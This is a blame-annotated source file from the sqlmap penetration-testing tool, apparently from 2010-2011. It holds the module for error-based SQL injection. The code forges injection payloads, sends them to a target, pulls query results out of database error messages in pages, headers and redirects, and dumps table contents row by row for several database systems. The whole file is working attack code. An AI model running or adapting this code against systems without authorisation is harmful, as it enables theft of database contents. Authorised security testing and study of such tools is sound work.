2010-10-20 13:09:04 +04:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
"""
|
|
|
|
$Id$
|
|
|
|
|
|
|
|
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
|
|
|
|
See the file 'doc/COPYING' for copying permission
|
|
|
|
"""
|
|
|
|
|
|
|
|
import re
|
|
|
|
import time
|
|
|
|
|
|
|
|
from lib.core.agent import agent
|
2011-01-31 15:21:17 +03:00
|
|
|
from lib.core.common import Backend
|
2011-01-19 02:02:11 +03:00
|
|
|
from lib.core.common import calculateDeltaSeconds
|
|
|
|
from lib.core.common import dataToSessionFile
|
2011-02-12 23:03:28 +03:00
|
|
|
from lib.core.common import dataToStdout
|
2010-12-06 10:48:14 +03:00
|
|
|
from lib.core.common import extractRegexResult
|
2011-03-22 12:22:48 +03:00
|
|
|
from lib.core.common import getUnicode
|
2010-12-18 12:51:34 +03:00
|
|
|
from lib.core.common import initTechnique
|
2011-01-19 02:02:11 +03:00
|
|
|
from lib.core.common import isNumPosStrValue
|
2011-01-31 15:21:17 +03:00
|
|
|
from lib.core.common import listToStrValue
|
2010-10-20 13:09:04 +04:00
|
|
|
from lib.core.common import randomInt
|
|
|
|
from lib.core.common import replaceNewlineTabs
|
|
|
|
from lib.core.common import safeStringFormat
|
2011-03-21 02:16:34 +03:00
|
|
|
from lib.core.convert import htmlunescape
|
2010-10-20 13:09:04 +04:00
|
|
|
from lib.core.data import conf
|
|
|
|
from lib.core.data import kb
|
|
|
|
from lib.core.data import logger
|
|
|
|
from lib.core.data import queries
|
2010-11-08 12:20:02 +03:00
|
|
|
from lib.core.enums import DBMS
|
2011-01-19 02:02:11 +03:00
|
|
|
from lib.core.enums import EXPECTED
|
2010-12-15 14:21:47 +03:00
|
|
|
from lib.core.enums import PAYLOAD
|
2011-01-19 02:02:11 +03:00
|
|
|
from lib.core.settings import FROM_TABLE
|
2011-02-08 19:23:33 +03:00
|
|
|
from lib.core.settings import MYSQL_ERROR_CHUNK_LENGTH
|
2011-03-17 12:12:28 +03:00
|
|
|
from lib.core.threads import getCurrentThreadData
|
2010-10-20 13:09:04 +04:00
|
|
|
from lib.core.unescaper import unescaper
|
|
|
|
from lib.request.connect import Connect as Request
|
2011-01-19 02:02:11 +03:00
|
|
|
from lib.utils.resume import resume
|
2010-10-20 13:09:04 +04:00
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
reqCount = 0
|
2010-10-25 18:11:47 +04:00
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
def __oneShotErrorUse(expression, field):
|
|
|
|
global reqCount
|
2010-12-18 12:51:34 +03:00
|
|
|
|
2011-03-17 12:12:28 +03:00
|
|
|
threadData = getCurrentThreadData()
|
|
|
|
|
2011-02-08 19:23:33 +03:00
|
|
|
retVal = None
|
2011-02-08 19:27:58 +03:00
|
|
|
offset = 1
|
2011-02-08 19:23:33 +03:00
|
|
|
|
|
|
|
while True:
|
|
|
|
check = "%s(?P<result>.*?)%s" % (kb.misc.start, kb.misc.stop)
|
|
|
|
nulledCastedField = agent.nullAndCastField(field)
|
2011-02-08 19:30:32 +03:00
|
|
|
|
2011-02-08 19:23:33 +03:00
|
|
|
if Backend.getIdentifiedDbms() == DBMS.MYSQL:
|
2011-02-08 19:30:32 +03:00
|
|
|
nulledCastedField = queries[DBMS.MYSQL].substring.query % (nulledCastedField, offset, MYSQL_ERROR_CHUNK_LENGTH)
|
2011-02-08 19:23:33 +03:00
|
|
|
|
|
|
|
# Forge the error-based SQL injection request
|
|
|
|
vector = kb.injection.data[PAYLOAD.TECHNIQUE.ERROR].vector
|
|
|
|
query = agent.prefixQuery(vector)
|
|
|
|
query = agent.suffixQuery(query)
|
|
|
|
injExpression = expression.replace(field, nulledCastedField, 1)
|
|
|
|
injExpression = unescaper.unescape(injExpression)
|
|
|
|
injExpression = query.replace("[QUERY]", injExpression)
|
|
|
|
payload = agent.payload(newValue=injExpression)
|
|
|
|
|
|
|
|
# Perform the request
|
|
|
|
page, headers = Request.queryPage(payload, content=True)
|
2011-03-17 12:12:28 +03:00
|
|
|
|
2011-02-08 19:23:33 +03:00
|
|
|
reqCount += 1
|
|
|
|
|
|
|
|
# Parse the returned page to get the exact error-based
|
|
|
|
# sql injection output
|
|
|
|
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
|
|
|
|
or extractRegexResult(check, listToStrValue(headers.headers \
|
2011-03-17 12:12:28 +03:00
|
|
|
if headers else None), re.DOTALL | re.IGNORECASE) \
|
|
|
|
or extractRegexResult(check, threadData.lastRedirectMsg[1] \
|
|
|
|
if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
|
|
|
|
threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
|
2011-02-08 19:23:33 +03:00
|
|
|
|
2011-03-22 15:21:56 +03:00
|
|
|
if output:
|
|
|
|
output = getUnicode(output, kb.pageEncoding)
|
2011-03-22 12:22:48 +03:00
|
|
|
|
2011-03-21 02:16:34 +03:00
|
|
|
if isinstance(output, basestring):
|
2011-03-21 02:20:47 +03:00
|
|
|
output = htmlunescape(output).replace("<br>", "\n")
|
2011-03-21 02:16:34 +03:00
|
|
|
|
2011-02-08 19:23:33 +03:00
|
|
|
if Backend.getIdentifiedDbms() == DBMS.MYSQL:
|
|
|
|
if offset == 1:
|
|
|
|
retVal = output
|
|
|
|
else:
|
|
|
|
retVal += output if output else ''
|
|
|
|
|
2011-02-08 19:29:42 +03:00
|
|
|
if not (output and len(output) == MYSQL_ERROR_CHUNK_LENGTH):
|
2011-02-08 19:23:33 +03:00
|
|
|
break
|
|
|
|
else:
|
|
|
|
offset += MYSQL_ERROR_CHUNK_LENGTH
|
|
|
|
else:
|
|
|
|
retVal = output
|
|
|
|
break
|
2010-10-26 13:33:18 +04:00
|
|
|
|
2011-03-21 16:13:12 +03:00
|
|
|
retVal = __errorReplaceChars(retVal)
|
|
|
|
|
2011-02-08 19:23:33 +03:00
|
|
|
dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(retVal)))
|
2010-10-20 13:09:04 +04:00
|
|
|
|
2011-02-08 19:23:33 +03:00
|
|
|
return retVal
|
2011-01-19 02:02:11 +03:00
|
|
|
|
|
|
|
def __errorFields(expression, expressionFields, expressionFieldsList, expected=None, num=None, resumeValue=True):
|
|
|
|
outputs = []
|
|
|
|
origExpr = None
|
|
|
|
|
|
|
|
for field in expressionFieldsList:
|
|
|
|
output = None
|
|
|
|
|
|
|
|
if field.startswith("ROWNUM "):
|
|
|
|
continue
|
|
|
|
|
|
|
|
if isinstance(num, int):
|
|
|
|
origExpr = expression
|
2011-02-07 19:24:23 +03:00
|
|
|
expression = agent.limitQuery(num, expression, field, expressionFieldsList[0])
|
2011-01-19 02:02:11 +03:00
|
|
|
|
|
|
|
if "ROWNUM" in expressionFieldsList:
|
|
|
|
expressionReplaced = expression
|
|
|
|
else:
|
|
|
|
expressionReplaced = expression.replace(expressionFields, field, 1)
|
|
|
|
|
|
|
|
if resumeValue:
|
|
|
|
output = resume(expressionReplaced, None)
|
|
|
|
|
|
|
|
if not output or (expected == EXPECTED.INT and not output.isdigit()):
|
|
|
|
if output:
|
|
|
|
warnMsg = "expected value type %s, resumed '%s', " % (expected, output)
|
|
|
|
warnMsg += "sqlmap is going to retrieve the value again"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
output = __oneShotErrorUse(expressionReplaced, field)
|
2011-02-01 00:13:29 +03:00
|
|
|
|
|
|
|
if output is not None:
|
2011-02-12 23:03:28 +03:00
|
|
|
dataToStdout("[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), replaceNewlineTabs(output, stdout=True)))
|
2011-01-19 02:02:11 +03:00
|
|
|
|
|
|
|
if isinstance(num, int):
|
|
|
|
expression = origExpr
|
|
|
|
|
2011-02-09 12:53:59 +03:00
|
|
|
outputs.append(output)
|
2011-01-19 02:02:11 +03:00
|
|
|
|
|
|
|
return outputs
|
|
|
|
|
2011-03-21 16:13:12 +03:00
|
|
|
def __errorReplaceChars(value):
|
|
|
|
"""
|
|
|
|
Restores safely replaced characters
|
|
|
|
"""
|
|
|
|
|
|
|
|
retVal = value
|
|
|
|
|
|
|
|
if value:
|
|
|
|
retVal = retVal.replace(kb.misc.space, " ").replace(kb.misc.dollar, "$")
|
|
|
|
|
|
|
|
return retVal
|
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
def errorUse(expression, expected=None, resumeValue=True, dump=False):
|
|
|
|
"""
|
|
|
|
Retrieve the output of a SQL query taking advantage of the error-based
|
|
|
|
SQL injection vulnerability on the affected parameter.
|
|
|
|
"""
|
|
|
|
|
|
|
|
initTechnique(PAYLOAD.TECHNIQUE.ERROR)
|
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
global reqCount
|
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
count = None
|
|
|
|
start = time.time()
|
|
|
|
startLimit = 0
|
|
|
|
stopLimit = None
|
|
|
|
outputs = []
|
|
|
|
untilLimitChar = None
|
|
|
|
untilOrderChar = None
|
|
|
|
reqCount = 0
|
|
|
|
|
|
|
|
if resumeValue:
|
|
|
|
output = resume(expression, None)
|
|
|
|
else:
|
|
|
|
output = None
|
|
|
|
|
|
|
|
if output and (expected is None or (expected == EXPECTED.INT and output.isdigit())):
|
|
|
|
return output
|
|
|
|
|
|
|
|
_, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression)
|
|
|
|
|
|
|
|
# We have to check if the SQL query might return multiple entries
|
|
|
|
# and in such case forge the SQL limiting the query output one
|
|
|
|
# entry per time
|
|
|
|
# NOTE: I assume that only queries that get data from a table can
|
|
|
|
# return multiple entries
|
2011-02-02 01:07:42 +03:00
|
|
|
if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in \
|
|
|
|
expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_TABLE) \
|
|
|
|
or (Backend.getIdentifiedDbms() in FROM_TABLE and not \
|
|
|
|
expression.upper().endswith(FROM_TABLE[Backend.getIdentifiedDbms()]))) \
|
2011-03-23 14:36:40 +03:00
|
|
|
and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) \
|
|
|
|
and not any(map(lambda x: x in expression.upper(), ["COUNT(*)", "EXISTS(", "MAX(", "MIN("])):
|
2011-02-02 01:07:42 +03:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
|
2011-01-19 02:02:11 +03:00
|
|
|
topLimit = re.search("TOP\s+([\d]+)\s+", expression, re.I)
|
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
if limitRegExp or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
|
|
|
|
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
|
|
|
limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
|
|
|
|
limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
|
2011-01-19 02:02:11 +03:00
|
|
|
|
|
|
|
if limitGroupStart.isdigit():
|
|
|
|
startLimit = int(limitRegExp.group(int(limitGroupStart)))
|
|
|
|
|
|
|
|
stopLimit = limitRegExp.group(int(limitGroupStop))
|
|
|
|
limitCond = int(stopLimit) > 1
|
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
2011-01-19 02:02:11 +03:00
|
|
|
if limitRegExp:
|
2011-01-28 19:36:09 +03:00
|
|
|
limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
|
|
|
|
limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
|
2011-01-19 02:02:11 +03:00
|
|
|
|
|
|
|
if limitGroupStart.isdigit():
|
|
|
|
startLimit = int(limitRegExp.group(int(limitGroupStart)))
|
|
|
|
|
|
|
|
stopLimit = limitRegExp.group(int(limitGroupStop))
|
|
|
|
limitCond = int(stopLimit) > 1
|
|
|
|
elif topLimit:
|
|
|
|
startLimit = 0
|
|
|
|
stopLimit = int(topLimit.group(1))
|
|
|
|
limitCond = int(stopLimit) > 1
|
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
|
2011-01-19 02:02:11 +03:00
|
|
|
limitCond = False
|
|
|
|
else:
|
|
|
|
limitCond = True
|
|
|
|
|
|
|
|
# I assume that only queries NOT containing a "LIMIT #, 1"
|
|
|
|
# (or similar depending on the back-end DBMS) can return
|
|
|
|
# multiple entries
|
|
|
|
if limitCond:
|
|
|
|
if limitRegExp:
|
|
|
|
stopLimit = int(stopLimit)
|
|
|
|
|
|
|
|
# From now on we need only the expression until the " LIMIT "
|
|
|
|
# (or similar, depending on the back-end DBMS) word
|
2011-01-28 19:36:09 +03:00
|
|
|
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
2011-01-19 02:02:11 +03:00
|
|
|
stopLimit += startLimit
|
2011-01-28 19:36:09 +03:00
|
|
|
untilLimitChar = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query)
|
2011-01-19 02:02:11 +03:00
|
|
|
expression = expression[:untilLimitChar]
|
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
2011-01-19 02:02:11 +03:00
|
|
|
stopLimit += startLimit
|
|
|
|
elif dump:
|
|
|
|
if conf.limitStart:
|
|
|
|
startLimit = conf.limitStart
|
|
|
|
if conf.limitStop:
|
|
|
|
stopLimit = conf.limitStop
|
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
# Count the number of SQL query entries output
|
2011-03-11 19:03:19 +03:00
|
|
|
countedExpression = expression.replace(expressionFields, "COUNT(*)", 1)
|
2011-01-19 02:02:11 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
if re.search(" ORDER BY ", expression, re.I):
|
|
|
|
untilOrderChar = countedExpression.index(" ORDER BY ")
|
|
|
|
countedExpression = countedExpression[:untilOrderChar]
|
2011-01-19 02:02:11 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
count = resume(countedExpression, None)
|
2011-01-19 02:02:11 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
if not count or not count.isdigit():
|
|
|
|
_, _, _, _, _, _, countedExpressionFields, _ = agent.getFields(countedExpression)
|
|
|
|
count = __oneShotErrorUse(countedExpression, countedExpressionFields)
|
2011-01-19 02:02:11 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
if (not count or (count.isdigit() and int(count) == 0)):
|
|
|
|
warnMsg = "it was not possible to count the number "
|
|
|
|
warnMsg += "of entries for the used SQL query. "
|
|
|
|
warnMsg += "sqlmap will assume that it returns only "
|
|
|
|
warnMsg += "one entry"
|
|
|
|
logger.warn(warnMsg)
|
2011-01-19 02:02:11 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
stopLimit = 1
|
|
|
|
elif isNumPosStrValue(count):
|
|
|
|
if isinstance(stopLimit, int) and stopLimit > 0:
|
|
|
|
stopLimit = min(int(count), int(stopLimit))
|
|
|
|
else:
|
|
|
|
stopLimit = int(count)
|
2011-01-19 02:02:11 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
infoMsg = "the SQL query used returns "
|
|
|
|
infoMsg += "%d entries" % stopLimit
|
|
|
|
logger.info(infoMsg)
|
2011-02-01 00:13:29 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
try:
|
|
|
|
for num in xrange(startLimit, stopLimit):
|
|
|
|
output = __errorFields(expression, expressionFields, expressionFieldsList, expected, num, resumeValue)
|
2011-01-19 02:02:11 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
if output and isinstance(output, list) and len(output) == 1:
|
|
|
|
output = output[0]
|
2011-01-19 02:02:11 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
outputs.append(output)
|
2011-01-19 02:02:11 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
except KeyboardInterrupt:
|
|
|
|
print
|
|
|
|
warnMsg = "Ctrl+C detected in dumping phase"
|
|
|
|
logger.warn(warnMsg)
|
2011-01-19 02:02:11 +03:00
|
|
|
|
2011-02-01 00:13:29 +03:00
|
|
|
if not outputs:
|
|
|
|
outputs = __errorFields(expression, expressionFields, expressionFieldsList)
|
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
if outputs and isinstance(outputs, list) and len(outputs) == 1 and isinstance(outputs[0], basestring):
|
2011-02-01 00:13:29 +03:00
|
|
|
outputs = outputs[0]
|
2011-01-19 02:02:11 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
duration = calculateDeltaSeconds(start)
|
|
|
|
|
|
|
|
debugMsg = "performed %d queries in %d seconds" % (reqCount, duration)
|
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
return outputs
|